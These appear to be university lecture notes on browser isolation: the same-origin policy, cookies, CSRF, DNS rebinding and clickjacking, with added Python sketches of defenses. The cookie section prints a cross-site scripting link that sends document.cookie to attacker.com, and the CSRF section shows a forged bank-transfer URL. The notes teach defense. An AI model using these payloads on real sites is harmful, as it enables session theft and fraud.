Web security
============

This lecture: isolation between sites in a web browser.
  Overall plan is called the "same-origin policy" (SOP)
    One of the best descriptions is in "The Tangled Web" (today's reading).
  Will try to cover some over-arching principles
  Will also talk about some interesting past/present pitfalls.
  Web browsers continuously change.
    New mechanisms have come out since "The Tangled Web".
    But mostly adding onto the existing design, rather than replacing it.

How did browser security plan come about?
  Origin: Netscape browser introduced SOP when adding support for Javascript
  Incremental design/development: no single coherent design.
    No one expected web browsers to be used in the ways they are today.
    Security issues patched as they were discovered, with extra rules/checks.
  Browser vendors competed (and to some extent still compete) on functionality.
    Adding new features (or even security mechanisms) before standards.
  Historically, W3C has largely been documenting what browsers already do,
    instead of proposing new standards that browsers will then implement.
  Browsers didn't always agree on overall plan, or the implementation details.
    Browser vendors concurrently implement similar features.
    Implementations get deployed before specifications are discussed or agreed on.
    Many quirks, see quirksmode.org.
    As a result, many inconsistent corner cases that can be exploited.
  Now, there's quite a bit of collaboration "behind the scenes".
    Developers of Chrome, Firefox, IE talk to each other a fair amount.
  Important issues get fixed slowly over time.
    Compatibility is a huge constraint, hard to break old sites.
    (Users will stop using your web browser!)
  Some of the fixes take place in the browser and Javascript libraries (jQuery, etc).
    When possible, just a compatibility layer on top of raw browser APIs.
  Some of the improvements come through new headers and cookie attributes
    E.g., Content-Security-Policy
    E.g., same-site cookies
  Many of the attacks we talk about today are more difficult to pull off
    E.g., most of lab4 attacks don't work with Chrome
  One reason this is a complicated security story is that there's a LOT of sharing!

In this lecture, we're going to focus on the client-side of a web application.
  In particular, how to isolate content from different providers in the same browser.
  Some of these details are handled by web frameworks and libraries (Meteor, jQuery, ...)
  Anyone building moderately complex web apps must know these details anyway.
    Need to know the limits of what the framework does and doesn't do.
    May need to extend the framework.
    May need to add a library that's not in the same framework.
    May need to interact with other web sites (facebook like button, google analytics, etc).
    May need to handle links to/from your application.
    May need to handle embedding of your application by other web sites.

Threat model / assumptions.  [ Are they reasonable? ]
  Attacker controls his/her own web site, attacker.com.
    Inevitable, with some other domain name.
  Attacker's web site is loaded in your browser.
    Advertisements, links, etc.
  Attacker cannot intercept/inject packets into the network.
    Will try to solve separately with SSL/TLS.
  Browser/server doesn't have implementation bugs (e.g., buffer overflows).
    Will try to solve separately with wide variety of techniques.

A single web application contains several types of content from a bunch of different principals.
  Example:

             http://foo.com/index.html

      +--------------------------------------------+
      |  +--------------------------------------+  |
      |  |        ad.gif from ads.com           |  |
      |  +--------------------------------------+  |
      |  +-----------------+ +------------------+  |
      |  | Analytics .js   | | jQuery.js        |  |
      |  | from google.com | | from cdn.foo.com |  |
      |  +-----------------+ +------------------+  |
      |                                            |
      |        HTML (text inputs, buttons)         |
      |                                            |
      |  +--------------------------------------+  |
      |  | Inline .js from foo.com (defines     |  |
      |  | event handlers for HTML GUI inputs)  |  |
      |  +--------------------------------------+  |
      |+------------------------------------------+|
      ||iframe: https://facebook.com/likeThis.html||
      ||                                          ||
      || +----------------------+ +--------------+||
      || | Inline .js from      | | f.jpg from   |||
      || | https://facebook.com | | https://     |||
      || |                      | | facebook.com |||
      || +----------------------+ +--------------+||
      ||                                          ||
      |+------------------------------------------+|
      |                                            |
      +--------------------------------------------+

  Q: Which pieces of JavaScript code can access which pieces of state?
  For example:
    Can the analytics code from google.com access state in the jQuery code from cdn.foo.com?
      Seems maybe bad since different principals wrote the code,
      but they are included in the same frame.
    Can the jQuery code from cdn.foo.com access state in the inline JavaScript code defined by foo.com?
      They're *almost* from the same place.
    Can the analytics code or jQuery access the HTML text inputs?
      We've got to make that content interactive somehow.
    Can JavaScript in the Facebook frame touch any state in the foo.com frame?
      Does it matter that the Facebook frame is https://, but the foo.com frame is regular http://?

One complication: to enforce policies, the browser must parse content correctly.
  It is difficult to identify Javascript precisely
  Example:
    <script> var x = 'UNTRUSTED'; </script>
    // Single quote breaks out of JS string
    // context into JS context
    //
    // "</script>" breaks out of JS context
    // into HTML context
  The UNTRUSTED string could contain </script>, breaking out of JS context.
    May be unintuitive.
  Similar challenges for URL parsing, dealing with internationalization, quoting rules.
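
  Sketch (not from the lecture): a server-side helper, in Python, that embeds an
  untrusted string in an inline script without letting it escape either the JS
  string context or the HTML script context. The function name js_string_literal
  and the sample payload are assumptions for illustration; real applications
  would normally rely on their template engine's escaping.

```python
import json

def js_string_literal(untrusted: str) -> str:
    """Return a JS string literal that is safe inside <script>...</script>."""
    # json.dumps wraps the value in double quotes and escapes " and \,
    # so the value cannot break out of the JS string context.
    literal = json.dumps(untrusted)
    # The HTML parser ends the script block at "</script" regardless of what
    # the JS parser thinks, so "<" must not appear literally either.
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))

# Hypothetical attacker-supplied value that tries both escapes from the notes.
payload = "'; alert(1); </script><script>alert(2)//"
page = "<script> var x = " + js_string_literal(payload) + "; </script>"
```

  The only "</script>" left in the page is the one the developer wrote; the
  browser's JS engine decodes the \u003c escapes back into the original text.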

Document object model
  After parsing, page is represented as a tree of objects, with which JavaScript interacts
  HTML elements -> DOM nodes organized in a tree.
  DOM nodes are objects that can be manipulated by Javascript.
  Global objects (window, document, XMLHttpRequest) allow add'l operations.
  HTML elements / DOM nodes can invoke Javascript via event handlers.
  JS issues HTTP requests using XMLHttpRequest or by creating DOM nodes.
  You will learn much more about Javascript in lab 4.

Isolation challenges
  The actor in a web browser is a document loaded in a window (or iframe).
    Moral equivalent in Unix: a program running in a process.
    Most interesting is an HTML document, but can have others (e.g., PDF).
  What can a document "do"?
    Link to other pages; user might click on a link: <a href="someurl">
    Include image files, style sheet files, etc: <img src="someurl">
    Load another document in a frame: <iframe src="someurl">
    Run Javascript code in the web browser: <script>.. code ..</script>
    Include Javascript code by URL: <script src="someurl">
  A document running Javascript code can perform many more operations.
    Access parts of the document for the current page.
    Access other windows and frames, and their documents.
    Navigate existing windows, frames.
    Open new windows, frames.
    Send requests over the network.
    ...

Browsers' answer: the same-origin policy
  Aspiration: two different websites should not be able to tamper with each other's content.
  Easy to state, but tricky to implement.
    Obviously bad: If I have two different web sites open, the first site
      should not be able to overwrite the visual display of the second site,
      or read its content (e.g., read confidential data).
    Obviously good: Developers should be able to create mash-up sites that
      combine content from mutually cooperative web sites.
        Example: A site that combines Google Map data with real estate data.
        Example: Advertisements.
        Example: Social media widgets (e.g., the Facebook "like" button).
    Not clear what the right answer should be, from first principles: If a page
      from web server X downloads a JavaScript library from a different server Y,
      what capabilities should that script have?
      (Of course, SOP does have a clear answer for this case, but it's not obvious
       that it's the best or only possible answer.)

Definition of an origin: scheme + hostname + port
  For example:
    http://foo.com/index.html      (http, foo.com, 80 [implicit])
    https://foo.com/index.html     (https, foo.com, 443 [implicit])
    http://bar.com:8181/index.html (http, bar.com, 8181)
  Schemes can be http, https, ftp, file, etc.
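
  Sketch (not from the lecture): computing the (scheme, hostname, port) triple
  in Python and comparing two URLs. The DEFAULT_PORTS table and the function
  names are assumptions for illustration; a real browser handles many more
  schemes and special cases.

```python
from urllib.parse import urlsplit

# Implicit ports for a few schemes (illustrative, not exhaustive).
DEFAULT_PORTS = {"http": 80, "https": 443, "ftp": 21}

def origin(url: str) -> tuple:
    """Return the (scheme, hostname, port) triple for a URL."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    # Fill in the implicit port when the URL does not name one.
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(scheme)
    return (scheme, parts.hostname or "", port)

def same_origin(url_a: str, url_b: str) -> bool:
    """Two URLs are same-origin only if all three components match."""
    return origin(url_a) == origin(url_b)
```

  For instance, http://foo.com/a and http://foo.com:80/b compare equal, while
  http://foo.com/ and https://foo.com/ do not, because the scheme (and hence
  the implicit port) differs.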

Basic isolation strategy of same-origin policy:
  Assign origin to actor (window/iframe) and resource (DOM elements, windows, network URLs, etc).
  Actor can access only resources that belong to its origin.
  Javascript code running in an actor gets the privileges of that actor's origin.

Main ideas in SOP:
  1) Client-side resources (e.g., cookies, DOM storage, a JavaScript namespace,
     a DOM tree, windows, a visual display area, network addresses) associated
     with an origin.
     [ An origin is the moral equivalent of a UID in the Unix world. ]
  2) Each window / iframe gets the origin of its URL.
     [ A frame is the moral equivalent of a process in Unix. ]
  3) Scripts included by a window / iframe execute with the authority (origin)
     of that window / iframe.  This is true for both inline scripts *and* ones
     that are pulled from external domains!
     [ Unix analogy: Running a binary or using a shared library that's stored
       in somebody else's home directory with your privileges. ]

Returning to our example:
  The Google analytics script and the jQuery script can access all the resources
  belonging to foo.com (e.g., they can read and write cookies, attach event
  handlers to buttons, manipulate the DOM tree, access JavaScript variables,
  etc.).

  JavaScript code in the Facebook frame has no access to resources in the
  foo.com frame, because the two frames have different origins. The two frames
  can only talk via postMessage(), a JavaScript API that allows domains to
  exchange immutable strings.

    If the two frames *were* in the same origin, they could use window.parent
    and window.frames[] to directly interact with each other's JavaScript
    state!

  JavaScript code in the Facebook frame cannot issue an XMLHttpRequest to foo.com's
  server and read the response, unless foo.com opts in (see CORS below).

    The network is a resource with an origin!

What happens if the browser gets the wrong MIME type of an object?
  E.g., say Facebook allows users to upload photos.
  User uploads an HTML document instead of their photo.
  Of course it doesn't render properly, but what if now their friend
    opens up "http://facebook.com/john.jpg"?

  HTTP response includes a Content-Type header.
    Specifies the MIME type of the content.
    In this case, probably image/jpeg.
    Browser should render it as a JPEG image, not run it as an HTML page.

  Unexpected "feature": content sniffing.
    Sometimes web servers are misconfigured, provide wrong header values.
    Browsers try to "helpfully" guess the document type by "sniffing the content".

  Problem:
    Browser might guess "HTML" as the type of "john.jpg" in our example.
    Victim visiting this URL runs John's HTML+JS in the facebook.com origin.
    John's HTML+JS can get the victim's cookie, etc.

  Moral: adding a well-intentioned feature may cause subtle and unexpected security bugs.
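
  Sketch (not from the lecture): a toy Python model of why sniffing is
  dangerous. The sniff() heuristic is a deliberately crude assumption, not any
  browser's real algorithm. X-Content-Type-Options: nosniff is a real response
  header that asks the browser to trust the declared type; the notes themselves
  do not cover it.

```python
def sniff(body: bytes) -> str:
    """Toy sniffer: guess a MIME type from the first bytes of the body."""
    head = body[:64].lstrip().lower()
    if head.startswith((b"<!doctype html", b"<html", b"<script")):
        return "text/html"
    if body.startswith(b"\xff\xd8\xff"):      # JPEG magic number
        return "image/jpeg"
    return "application/octet-stream"         # no confident guess

def effective_type(headers: dict, body: bytes, sniffing_enabled: bool = True) -> str:
    """Type the toy browser would use to render the response."""
    declared = headers.get("Content-Type", "")
    if not sniffing_enabled or headers.get("X-Content-Type-Options") == "nosniff":
        return declared
    guessed = sniff(body)
    # The "helpful" behavior: a confident guess overrides the server's header.
    return guessed if guessed != "application/octet-stream" else declared

# John's "photo" is really an HTML page with a script in it.
john_jpg = b"<html><script>/* steal cookie */</script></html>"
```

  With sniffing on, effective_type({"Content-Type": "image/jpeg"}, john_jpg)
  yields text/html, so the upload would run as a page in the hosting origin;
  adding the nosniff header makes the toy browser stick with image/jpeg.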

What are some of the resources that matter in a web browser?
  Browser windows.
  DOM nodes.
  HTTP cookies.
  HTTP responses.
  Network addresses (what machines can you talk to over the network).
  Pixels on the screen (in part for UI security).

Frame/window objects
  Get the origin of their frame's URLs
           -OR-
  Get the origin of the adjusted document.domain
    A frame's document.domain starts out as the hostname of the frame's URL.
    A frame can set document.domain to be a suffix of the full domain. Ex:
             x.y.z.com             //Original value
             y.z.com               //Allowable new value
             z.com                 //Allowable new value
             a.y.z.com             //Disallowed
             .com                  //Disallowed
    Why allow adjustment?
      Frame from payment.example.com may want to talk to a frame from login.example.com
    Browsers distinguish between a document.domain that has been written, and
      one that has not, even if both have the same value!
    Two frames can access each other if their document.domain is the same
      AND both adjusted it or neither adjusted it.
    These rules help protect a site from being attacked by a buggy/malicious subdomain.
      E.g., x.y.z.com trying to attack y.z.com by shortening its document.domain.
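
  Sketch (not from the lecture): the suffix rule and the "both adjusted or
  neither adjusted" rule as a toy Python model. The Frame class and function
  names are assumptions; the "at least two labels" test is a crude stand-in for
  a real public-suffix check, and scheme and port are ignored here.

```python
from dataclasses import dataclass

def may_set_document_domain(current_host: str, new_value: str) -> bool:
    """Suffix rule: new value must be the host itself or a parent domain."""
    cur = current_host.lower().split(".")
    new = new_value.lower().strip(".").split(".")
    if len(new) < 2:                 # rejects bare suffixes such as ".com"
        return False
    return len(new) <= len(cur) and cur[-len(new):] == new

@dataclass
class Frame:
    host: str
    domain: str = ""
    domain_was_set: bool = False     # browsers remember whether it was written

    def __post_init__(self):
        self.domain = self.domain or self.host

    def set_domain(self, value: str) -> None:
        if not may_set_document_domain(self.host, value):
            raise ValueError("disallowed document.domain: " + value)
        self.domain = value
        self.domain_was_set = True

def can_access(a: Frame, b: Frame) -> bool:
    """Same document.domain AND both adjusted it or neither adjusted it."""
    return a.domain == b.domain and a.domain_was_set == b.domain_was_set
```

  In this model a frame on x.y.z.com that shortens its domain to y.z.com still
  cannot reach a y.z.com frame that never touched document.domain; access only
  opens up once the y.z.com frame opts in by writing the value too.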

DOM nodes
  Get the origin of their surrounding window/frame

Cookies
  Ubiquitous mechanism to keep state (e.g., session info) in browser.
    Typically holds user's authentication token: juicy target!
    Cookies predate SOP.
  A cookie has a domain AND a path. Ex: *.mit.edu/6.858/
    Domain can only be a (possibly full) suffix of a page's current domain.
    Path can be "/" to indicate that all paths in the domain should have access to the cookie.
  Whoever sets cookie gets to specify the domain and path.
    Can be set by the server using a header, or by JavaScript code that writes to document.cookie.
    There's also a "secure" flag to indicate HTTPS-only cookies.
  Browser keeps cookies on client-side disk (modulo cookie expiration, ephemeral cookies, etc).
  When generating an HTTP request, the browser sends all matching cookies in the request.
    Secure cookies only sent for HTTPS requests.
  JavaScript code can access any cookie that matches the origin under which the code is running.
    Developers must be careful that their pages don't include an attacker's JavaScript.
    Risk: "cross-site scripting" attack
      For example: attacker puts a cookie-stealing URL in a post/comment field

      <a href="#" onclick="window.location='http://attacker.com/stole.cgi?text='+escape(document.cookie); return false;">Click here!</a>

      This link steals the cookies of any user who clicks on it.
      Website developers must filter out such malicious code.
      More next week and in lab 4.
    Note that the cookie's path and the origin's port are ignored!
  The protocol matters, because HTTP JavaScript cannot access HTTPS cookies
    (although HTTPS JavaScript can access both kinds of cookies).
  Cookies in general provide weak integrity protection.
    Can be set by "sibling" domains (e.g., x.foo.com can set cookie for foo.com, which is also sent to y.foo.com).
    Can be set by insecure page and sent to secure page.
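
  Sketch (not from the lecture): how a browser might decide which cookies to
  attach to a request, as a toy Python model of the domain, path, and "secure"
  rules above. The Cookie class and helper names are assumptions; expiration
  and other cookie attributes are left out.

```python
from dataclasses import dataclass

@dataclass
class Cookie:
    name: str
    domain: str
    path: str = "/"
    secure: bool = False

def domain_matches(host: str, cookie_domain: str) -> bool:
    """Host equals the cookie domain or is a subdomain of it."""
    host = host.lower()
    cookie_domain = cookie_domain.lower().lstrip(".")
    return host == cookie_domain or host.endswith("." + cookie_domain)

def path_matches(request_path: str, cookie_path: str) -> bool:
    """Cookie path must be a prefix of the request path on a '/' boundary."""
    if request_path == cookie_path:
        return True
    if request_path.startswith(cookie_path):
        return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"
    return False

def cookies_to_send(jar, scheme: str, host: str, path: str) -> list:
    """Names of all cookies in the jar that match this request."""
    return [c.name for c in jar
            if domain_matches(host, c.domain)
            and path_matches(path, c.path)
            and (scheme == "https" or not c.secure)]

jar = [Cookie("sid", "mit.edu", "/6.858/"),
       Cookie("auth", "mit.edu", "/", secure=True)]
```

  The same matching explains the sibling-domain weakness: a cookie whose domain
  is foo.com goes to both x.foo.com and y.foo.com, no matter which one set it.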

Why is it important to protect cookies from arbitrary overwriting?
  If an attacker controls a cookie, the attacker can force the user to use
    an account that's controlled by the attacker!
  Example: By setting the cookie for google.com, an attacker can cause
    the user to use the attacker's Google account, recording the user's
    search queries there.

Q: Can foo.co.uk set a cookie's domain to co.uk?
  A: This is valid according to the suffix rule above, but in practice, we
     should disallow such a thing, since ".co.uk" is semantically a single,
     "atomic" domain like ".com". Mozilla maintains a public list which allows
     browsers to determine the appropriate suffix rules for top-level domains.
     [ https://publicsuffix.org ]
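
  Sketch (not from the lecture): combining the suffix rule with a public-suffix
  check, in Python. PUBLIC_SUFFIXES here is a tiny hand-written excerpt chosen
  for illustration, not the real list, and the function name is an assumption.

```python
# Hypothetical excerpt; the real Public Suffix List has thousands of entries.
PUBLIC_SUFFIXES = {"com", "edu", "uk", "co.uk"}

def may_set_cookie_domain(page_host: str, cookie_domain: str) -> bool:
    """Allow a cookie domain only if it is a suffix of the page's host
    and is not itself a public suffix."""
    page_host = page_host.lower()
    cookie_domain = cookie_domain.lower().lstrip(".")
    is_suffix = (page_host == cookie_domain
                 or page_host.endswith("." + cookie_domain))
    return is_suffix and cookie_domain not in PUBLIC_SUFFIXES
```

  Under this model foo.co.uk may not set a cookie for co.uk, even though co.uk
  passes the plain suffix test, while www.foo.co.uk may set one for foo.co.uk.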

HTTP responses: Many exceptions and half-exceptions to same-origin policy.
  XMLHttpRequests: By default, JavaScript can only send XMLHttpRequests to its
    origin server, unless the remote server has enabled Cross-origin Resource
    Sharing (CORS). The scheme defines some new HTTP response headers:
      Access-Control-Allow-Origin specifies which origins can see HTTP response.
      Access-Control-Allow-Credentials specifies whether the browser may expose
        the response to the script when the request carried credentials (e.g., cookies).
  Images: A frame can load an image from any origin; it can't look at the image
    pixels, but it can determine the image's size.
  CSS: Similar story to images: a frame can't directly read the content of
    external CSS files, but can infer some of its properties.
  JavaScript: A frame can load JavaScript from any origin; it can't directly
    examine the source code in a <script> tag/XMLHttpRequest response
    body, but all JavaScript functions have a public toString() method which
    reveals source code.
  Plugins: A frame can load an object from any origin using an already-installed plugin.
       <embed src=...> //Requires plugin-specific
                       //elaborations.
  Arbitrary requests: A frame can navigate to an arbitrary URL (either GET or POST).
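
  Sketch (not from the lecture): the browser-side decision for the two CORS
  headers above, as a toy Python model. Origins are plain strings such as
  "https://foo.com"; the function name is an assumption, and preflight requests
  and the other Access-Control-* headers are ignored.

```python
def script_may_read_response(page_origin: str, target_origin: str,
                             response_headers: dict,
                             with_credentials: bool = False) -> bool:
    """May JavaScript running in page_origin see this response?"""
    if page_origin == target_origin:
        return True                       # same-origin: always readable
    allow_origin = response_headers.get("Access-Control-Allow-Origin")
    if with_credentials:
        # With cookies attached, the wildcard is not accepted: the server must
        # name the origin exactly and also allow credentials explicitly.
        return (allow_origin == page_origin and
                response_headers.get("Access-Control-Allow-Credentials") == "true")
    return allow_origin in ("*", page_origin)
```

  Note that the request is still sent in every case; the check only controls
  whether the script gets to look at the response.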

Complication: interaction between the above rules for navigation, and cookies.
  When the browser generates an HTTP request, it automatically includes the relevant cookies.
  What happens if an attacker creates a web page containing a frame whose URL is something like:

        http://bank.com/xfer?amount=500&to=attacker

  User visits the page.
  Browser will send user's cookie to bank.com.
  Server thinks it is a valid transfer, and transfers the money.
  This attack is called a "cross-site request forgery" (CSRF).

  Solution: Server includes random data in URLs or forms that is difficult for the attacker to guess.

    <form action="/transfer.cgi" ...>
      <input type="hidden"
             name="csrfToken"
             value="a6dbe323..."/>

  Each time a user requests the page, the server generates HTML with new random tokens.
  When the user submits a request, the server validates the token before processing the request.
  Drawback: Server must keep state.
  Weak alternative: store this random token in the cookie (but then susceptible to cookie-setting).
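
  Sketch (not from the lecture): the server side of the token scheme in Python,
  keeping one token per session in memory. The csrf_tokens dictionary, the
  session ids, and the function names are assumptions for illustration; a real
  server would tie this to its session store.

```python
import hmac
import secrets

# Server-side state: session id -> most recently issued token.
csrf_tokens = {}

def render_transfer_form(session_id: str) -> str:
    """Generate the form with a fresh, unguessable token."""
    token = secrets.token_hex(16)
    csrf_tokens[session_id] = token
    return ('<form action="/transfer.cgi" method="post">'
            f'<input type="hidden" name="csrfToken" value="{token}"/>'
            '</form>')

def handle_transfer(session_id: str, form: dict) -> str:
    """Validate the token before processing the request."""
    expected = csrf_tokens.get(session_id)
    submitted = form.get("csrfToken", "")
    # compare_digest avoids leaking how many leading characters matched.
    if expected is None or not hmac.compare_digest(expected.encode(),
                                                   submitted.encode()):
        return "403 Forbidden"
    return "200 OK"
```

  A forged request from attacker.com still carries the user's cookie, but the
  attacker cannot read the form from bank.com's origin, so it cannot supply the
  matching csrfToken value.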

Network addresses almost have an origin.
  A frame can send HTTP *and* HTTPS requests to a host+port that match its origin.
  Complication: the security of the same-origin policy depends on the integrity
    of the DNS infrastructure!
  DNS rebinding attack.
    Goal: Attacker wants to probe internal servers from a victim's computer.
    Approach:
    1) Attacker registers a domain name (e.g., attacker.com) and creates a DNS
       server to respond to the relevant queries with a short time-to-live.
    2) User visits the attacker.com website, e.g., by clicking on an advertisement.
    3) The attacker's page issues an XMLHttpRequest for http://attacker.com/something.
       The DNS record for attacker.com timed out, so browser asks attacker's DNS server again.
    4) Attacker's DNS server responds with IP address of internal device on victim's network.
    5) Request is sent to internal device, and attacker's code in victim's browser gets the response.
  Solutions
    Modify DNS resolver so that hostnames cannot switch from external (non-RFC1918)
      to internal (RFC1918) addresses.
    Ignore TTL and pin the IP address until the page is closed.
    Downside: may break load-balancers that need to switch IP address if a server fails.
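
  Sketch (not from the lecture): both defenses as toy Python wrappers around a
  lookup function. The class names and the injected lookup callable are
  assumptions; only the three RFC 1918 IPv4 ranges are treated as internal.

```python
import ipaddress

RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)

class RebindingFilter:
    """Refuse answers that move a hostname from external to internal."""
    def __init__(self, lookup):
        self.lookup = lookup            # callable: hostname -> IP string
        self.seen_external = set()

    def resolve(self, hostname: str) -> str:
        ip = self.lookup(hostname)
        if is_internal(ip):
            if hostname in self.seen_external:
                raise ValueError("possible DNS rebinding: " + hostname)
        else:
            self.seen_external.add(hostname)
        return ip

class PinningResolver:
    """Ignore TTLs: keep the first answer until the pin is dropped."""
    def __init__(self, lookup):
        self.lookup = lookup
        self.pinned = {}

    def resolve(self, hostname: str) -> str:
        if hostname not in self.pinned:
            self.pinned[hostname] = self.lookup(hostname)
        return self.pinned[hostname]
```

  Feeding either wrapper a lookup that answers 203.0.113.7 first and
  192.168.1.1 second reproduces steps 3 and 4 of the attack: the filter raises
  on the second answer, and the pinning resolver never asks again.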

What about the pixels on a screen?
  They don't have an origin!  A frame can draw anywhere within its bounding box.
  Problem: A parent frame can overlay content atop the pixels of its child frames.
    E.g., attacker creates a page which has an enticing button like "Click here for a free iPad!"
    Atop that button, the page creates a child frame that contains the Facebook "Like" button.
    The attacker places that button atop the "free iPad" button, but makes it transparent.
    So, if the user clicks on the "free iPad" button, they'll actually "Like" the attacker's page on Facebook.
  Solutions
    1) Frame-busting code: Include JavaScript that prevents your page from being included as a frame.
    2) Have your web server send the X-Frame-Options HTTP response header.
       This will instruct the browser not to put your content in a child frame.
    3) Content Security Policy's frame-ancestors directive.
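
  Sketch (not from the lecture): solutions 2 and 3 from the server's point of
  view, plus a toy Python model of the browser's check. The header names and
  values are real; the function names are assumptions, and the check looks only
  at X-Frame-Options and only at the immediate parent frame.

```python
def anti_framing_headers(allow_same_origin: bool = False) -> dict:
    """Response headers a server could send to forbid cross-origin framing."""
    if allow_same_origin:
        return {"X-Frame-Options": "SAMEORIGIN",
                "Content-Security-Policy": "frame-ancestors 'self'"}
    return {"X-Frame-Options": "DENY",
            "Content-Security-Policy": "frame-ancestors 'none'"}

def browser_may_frame(headers: dict, parent_origin: str,
                      framed_origin: str) -> bool:
    """Toy version of the browser's decision to render a page in a frame."""
    xfo = headers.get("X-Frame-Options", "").upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return parent_origin == framed_origin
    return True                      # no header: framing is allowed
```

  Without the headers, the attacker's page can frame the "Like" button and lay
  it over the "free iPad" button; with them, the browser refuses to render the
  framed page, so there is nothing to click.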

What about frame URLs that don't have an obvious origin?
  file://foo.txt
  about:blank
  javascript:document.cookie="x"
  data:xxx

  Problem: what origin should be assigned to such URLs?
    Applications legitimately navigate to "javascript:function()" to run JS in their page.
    Same for "data:<html>...</html>"; may need access to creator's origin?
    So these URLs may need to run in the same origin as the frame.
    What if one origin's frame navigates a different origin's frame to "javascript:foo()"?

  Origin inheritance
    Origin is inherited from whoever created the URL (e.g., "javascript:", "data:").
    This prevents attacks in which attacker.com creates a frame belonging to victim.com,
      and then navigates the victim frame to a javascript: URL.
    We don't want the JavaScript to execute in the context of victim.com!

  Many special cases, especially around file: and about: URLs.

Names can be used as an attack vector!
  IDN: internationalized domain names (non-latin letters).
  Can be difficult for users to distinguish two domain names from each other.
    The Cyrillic "C" character looks like the Latin "C" character!
    Attacker can buy a domain like "cats.com" (with a Cyrillic "C").
    Trick users who thought that they were going to "cats.com" (Latin "C").
  Another example of how new features can undermine security assumptions.
    Browser vendors thought registrars would prohibit ambiguous names.
    Registrars thought browser vendors would change browsers to do something.
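
  Sketch (not from the lecture): telling the two "cats.com" names apart in
  Python. The helper names are assumptions, and splitting the Unicode character
  name to find the script is a rough heuristic, not how browsers decide when to
  display an IDN.

```python
import unicodedata

latin = "cats.com"
spoof = "\u0441ats.com"      # first letter is Cyrillic U+0441, not Latin "c"

def scripts_used(label: str) -> set:
    """Rough script detection: first word of each letter's Unicode name."""
    return {unicodedata.name(ch).split()[0] for ch in label if ch.isalpha()}

def to_ascii(hostname: str) -> str:
    """ASCII ("punycode") form of the name, as it appears in DNS."""
    return hostname.encode("idna").decode("ascii")
```

  The two strings render almost identically but compare unequal; the spoofed
  label mixes CYRILLIC and LATIN letters and turns into an "xn--" name in its
  ASCII form, which is one signal a browser can use before showing it to the
  user.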

Styling side channels.
  Link color/styling differs based on user's browsing history.
  One site can check if the user visited other sites by checking how links are styled!
  Browsers tried prohibiting reading the color of links, or simulating them as un-visited.
  But then CSS allowed more complex styling (e.g., large font for visited links).
  Now the whole page layout can change depending on whether a link is visited.

Plugins often have subtly-different security policies
  Java: Sort of uses the same-origin policy, but Java code can set HTTP headers
    (bad! see "Content-Length" discussion), and in some cases, different
    hostnames with the same IP address are considered to share the same origin.
  Flash: Developers place a file called crossdomain.xml on their web
    servers. That file specifies which origins can talk to the server via Flash.

Since "The Tangled Web," there have been various modifications and additions to the aggregate web stack.
  In general, things have gotten more complicated, which is typically bad for security.
  For reference, here are some of the new features:
    http://en.wikipedia.org/wiki/Content_Security_Policy
    http://en.wikipedia.org/wiki/Strict_Transport_Security
    http://en.wikipedia.org/wiki/Cross-origin_resource_sharing
    HTML5 iframe sandbox attribute
      https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe

SOP is simple on one hand, but complex on the other hand: many subtleties and inconsistencies.
  Q:  Why not rewrite the security model from scratch?
  A1: Backwards compatibility! There's a huge amount of preexisting web
      infrastructure that people rely on.
  A2: How do we know that a new security model would be expressive enough?
      Users typically do not accept a reduction of features in exchange for an
      increase in security.
  A3: Any security model must evolve.

What might a better design look like?  What ideas should go into an improved design?
  Be explicit everywhere: no ambiguity or guessing.
    No suffix rule?
    Don't guess MIME types.
  Clear notion of a principal that's not tied to anything else.
    Don't run foreign javascript with the complete authority of the web page?
  Clear plan for what principal is used for every operation.
    No ambient authority.
    Specify what cookie to send on HTTP request?
    Rules on interaction between user clicks and visibility of elements.
  Clear plan for what resources are protected, what the access rules are.
    Helps app developers know what they can rely on.
    No exceptions (e.g., no images and javascript from outside of origin).
  Make it easy to figure out security-relevant pieces.
    Don't require complex parser (e.g., HTML, HTTP headers) to get policy.
    No inline javascript?
  Clear mechanism for web sites to interact (postMessage).
    No need for guessing, no need for suffix rule.